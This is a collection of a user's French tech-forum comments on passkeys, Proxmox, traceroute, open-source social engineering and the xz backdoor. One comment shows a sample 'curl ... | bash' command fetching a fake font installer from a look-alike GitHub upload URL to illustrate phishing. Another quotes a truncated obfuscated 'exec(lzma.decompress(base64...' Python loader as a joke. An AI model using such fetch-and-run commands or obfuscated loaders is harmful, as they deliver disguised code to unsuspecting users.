cg a écrit 1378 commentaires

Un remote dd pour copier des fichiers ? Malheureux ! Tout l'enjeu est de s'en débarrasser :).

DDaaS (Dumpster Diving as a Service) c'est le moteur de recherche dans les poubelles, utilisé par les partenaires comme expliqué dans Privacy.

Et puis pour <, merci mais si en plus faut installer un shell, c'est l'usine à Gaz (UaGaaS ?)…

C'est ringard ces technos, le script one-less-to-go.sh devrait être réécrit en Rust ou en Zig.

Et la sélection du fichier devrait être faite à partir du service Random-as-a-Service, pas avec shuf, ça introduit une dépendance système à coreutils inutile sinon.

En plus il n'y a pas d'API Serverless, le comble pour un service Useless.

Dommage car j'avais plein de données à supprimer, je vais devoir racheter un nouveau NAS 200To.

On peut quand même leur accorder qu'ils ont un bon succès, témoin cette prochaine IPO montée dans le plus grand secret avec l'excellent Dumpser-Diving-as-a-Service (DDaaS).

Le billet de blog Passkeys: A Shattered Dream par l'auteur principal de la bibliothèque webauthn-rs est très intéressant. (par contre c'est en Anglais)

C'est peut-être que tu retires le support trop tôt, ou alors c'est un bug de l'installeur qui cherche à écrire un dernier log.

Tada :o) !

#define SAFE_FREE(ptr) free(ptr)

Oui, par exemple dans Debian et ses dérivés, il y a un répertoire /var/log/installer/ qui contient tout ce qu'il s'est passé pendant l'installation.

Oui c'est vrai, ça semble logique.

Ceci dit, si un utilisateur supprime son compte, que devient le fichier ? Le lien doit être banalisé genre "https://github.com/deleted-user-{UUID_de_l_utilisateur_supprimé}/files/{identifiant_du_fichier}/{nom_du_fichier}".

Ceci étant, ce n'est pas forcément critique de perdre des pièces jointes dans un commentaire, mais bon, il doit bien y avoir des cas où ça ne fonctionne pas. Je souhaite bien du courage à GitHub pour ce petit casse-tête !

Je suis d'accord et pas d'accord avec toi que le terme est tangent. Ce n'est pas une faille technique, mais ça exploite une faille humaine. Quand on voit comment ça se passe avec le phishing par mail, c'est plutôt astucieux. On nous habitue à vérifier les URLs dans les mails, etc… Et là ça fait des URLs toutes jolies.

Il n'y a pas de mécanisme permettant de différencier qu'un fichier a été déposé par un membre du projet vs une personne random. Une petite icône à côté des fichiers posés par un tiers peut mitiger le problème, par exemple, ou un schéma un peu différent.

Exemple :

Pour installer la police de caractères ScreamingTurtle utilisée par YoupiScanner, faites simplement :

curl https://example.com/microsoft/msfonts/files/abc123def456/screamingturtle-font-installer.sh | bash¹

Si l'URL était comme ceci :

curl https://example.com/microsoft/msfonts/comments-uploads/files/abc123def456/screamingturtle-font-installer.sh | bash

peut-être que dans 2% des cas on ne download pas le fichier.

Ça devrait te parler : RETEX Incident de sécurité au CHU de Brest.

Attention, âmes sensibles s'abstenir !

Le petit guide "mais que faire en cas d'attaque".

C'est ambigu :

~ $ python
>>> "157"*231
'157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157157'

(un peu en avance sur le trolldi, désolé)

C'est plus équivalent à une paire clé privée/clé publique pour SSH. Ce n'est pas un mot de passe connu de toi et du service (Pre-Shared Key). Dans le cas des passkeys, la clé privée ne sort jamais du gestionnaire de mots de passe ou de la clé de sécurité.

Par contre, et c'est là que ça devient tangent, ça laisse croire qu'il n'y a magiquement plus besoin de s'occuper de ses mots de passe ou de sa sécurité. Hors, si les passkeys (ou des mots de passes classiques) sont stockées dans un téléphone ou un ordi qui ne sont pas sauvegardés (c'est à dire probablement la majorité), en cas de perte de l'appareil, c'est game over. Perso, je n'ai pas de solution à ça :(.

L'article de Clubic dit :

les différents acteurs majeurs de la tech se sont convertis aux passkeys, ces identifiants biométriques remplaçant les traditionnels mots de passe.
[…]
Les passkeys utilisent, quant à eux, l'identification biométrique

C'est formulé très clairement, et c'est totalement faux ! Sur mon PC Linux, j'ai Bitwarden qui stocke des passkeys (par exemple pour Github), et il n'y a aucun capteur biométrique. Sur mon téléphone, je peux déverrouiller Bitwarden avec une empreinte digitale, mais c'est totalement optionnel, je peux aussi le faire avec ma Yubikey ou un TOTP, et accéder à mes passkeys, entre autres identifiants.

Que les GAFAM soient en position dominante et proposent des services captifs c'est chiant, mais pas la peine de mentir ou de dire des semi-vérités.

Oui, c'est pénible d'avoir des pages de superlatifs supralaxatifs sans arriver à saisir ce que ce logiciel qui va changer le monde peut faire vraiment pour toi.

Une variante est quand il y a plusieurs gammes ou plusieurs offres. Elles sont toutes excellentes et parfaites (best in class, best value, state of the art, cutting edge…). Que faut-il choisir, la meilleure ou la encore plus meilleure ?

Souvent, aller voir sur Wikipedia (exemple pour Netlify) permet d'y voir plus clair.

Un super contre-exemple que j'adore, c'est cet extrait du début de la doc de The Bastion :

Wait, what's a bastion exactly? (in 140-ish characters)

A so-called bastion is a machine used as a single entry point by operational teams (such as sysadmins, developers, devops, database admins, etc.) to securely connect to other machines of an infrastructure, usually using ssh.

The bastion provides mechanisms for authentication, authorization, traceability and auditability for the whole infrastructure.

La page de Tracim est plutôt bien faite aussi, on peut faire le tour des fonctions principales et cas d'usage en lisant en diagonale.

C'est un bel infomercial pour la solution de Proton et leurs autres produits. Des gestionnaires de mots de passe comme Bitwarden, KeepassXC et autres concurrents de Proton Pass gèrent les passkeys, ce sur quoi l'article fait gentiment l'impasse¹.

Et si on a une clé de sécurité physique comme une Nitrokey, une Titankey ou une Yubikey, ça gère les passkeys et le FIDO2 aussi.

Bref, avec tout le respect que j'ai pour Proton, cet article ne me semble pas totalement honnête, c'est dommage.

Mais, mais, ce n'est ni en France ni dans la Communauté Européenne !

Et on dirait que l'offre n'est pas gratuite, mais comprise avec l'achat d'un nom de domaine, donc autour de 5-15€ par an.

Merci pour ce pavé, c'est intéressant !

La lecture de ton second paragraphe m'a fait me demander un truc, quand même. Est-ce que tu as des attentes différentes pour les logiciels propriétaires (gratuit ou payant) ? Par exemple, la sensation que tu ne peux pas contacter les devs. Tu trouves ça attendu (voire normal) d'avoir une backdoor dans le logiciel s'il est proprio ?

Pour revenir sur l'article, je crois que le propos est de dire que les faiblesses humaines sont plus faciles à exploiter sur les petits projets libres, pour ces raisons :

• en tant qu'humain, on cherche à avoir des interactions. Avoir un camarade qui réfléchit et participe, ça fait du bien ;
• les projets libres, surtout les petits, ont un héritage culturel et une gouvernance qui font que c'est plus facile de participer¹.

Ces deux traits forment un modèle de menace, j'imagine qu'il vaut mieux en être conscient. Cette menace existe aussi dans les projets proprios, mais la barre est plus haute pour entrer.

Un petit gag en vidéo pour terminer : Linus Torvalds Admits He's Been Asked To Insert Backdoor Into Linux

Si tu pars du principe que l'utilisateur lit et comprend la licence, aussi…

Salut,

Le R720 et Proxmox s'aiment bien.

Le problème provient sans doute d'autre chose. Le fait que ce message ACPI, qui est surtout un warning, soit le dernier ou vers les derniers, n'indique pas tellement que c'est la cause du problème. Tu peux essayer de démarrer avec un système type System Rescue, voir s'il n'y a pas un problème niveau réseau (peut-être le firmware d'une carte Broadcom qui a été mis à jour ?), faire les diagnostics depuis l'IDRAC…

Est-ce que ça a fonctionné et "ça marche plus", ou ça n'a jamais fonctionné ? Parfois il suffit de sortir et replacer les barrettes de RAM ou les CPUs.

Est-ce que ça démarre en mode "emergency" ?

(Note: Proxmox 8.1 est sorti il y a un certain temps)

Concernant le traceroute qui ne passe pas, c'est parce que c'est de l'UDP sur des ports variables, alors que ping et mtr utilisent de l'ICMP (j'étais pas certain alors j'ai vérifié avec wireshark). Sans doute que tu n'as pas autorisé tous les ports à passer sur le VPN ?

J'ai tendance à utiliser tcptraceroute sur le port 80 ou 443, c'est souvent ouvert. Le défaut c'est qu'il faut avoir les droits root pour l'utiliser.

Si depuis chez ta famille, la route vers le VPN a pour gateway une IP dans 192.168.20.0/24, je ne crois pas que le VPN constitue un saut visible.

Ce qui est génial, c'est que sur ton blog, l'article de 2020 mentionne déjà :

 import base64,lzma;exec(lzma.decompress(base64.b85decode("{Wp48S^xk9=GL@E0stWa761SMbT8$j;4$nE7F_@lh

T'es un peu un précurseur non ;) ?

Intéressant… Perso je fais une purge automatique des messages SMS et des messageries instantanées quand c'est possible, car je vois peu l'intérêt de conserver l'historique, ça me pollue la tête plus qu'autre chose. De ce point de vue, les tapis roulants genre Slack et Discord me font de la peine.

Je suis curieux, ça arrive de se référer ou de relire des messages genre SMS/IM anciens ?

Autant que ça pourrait être la France, j'imagine.

Beaucoup de commentaires disent que c'est probablement une agence étatique, mais ça peut très bien être une mafia privée, y'a pas de raison :).

Pour celles et ceux que ça intéresse mais qui ont du mal à suivre le jargon :

la backdoor permet d'exécuter des commandes à distance sur une machine infectée. Mais ce n'est pas ouvert à tout un chacun : l'accès à ce mécanisme est réservé aux personnes qui ont possession d'un certificat SSH spécifique.

Vivement que les analyses finales soient publiées. Avec un peu de chance, les spécialistes du domaine y verront un certain style d'écriture qui permettra de recouper avec d'autres bouts de code malicieux, et donc de spéculer plus précisément sur la paternité de la chose.

Bé non c'était lundi la journée mondiale de la procrastination !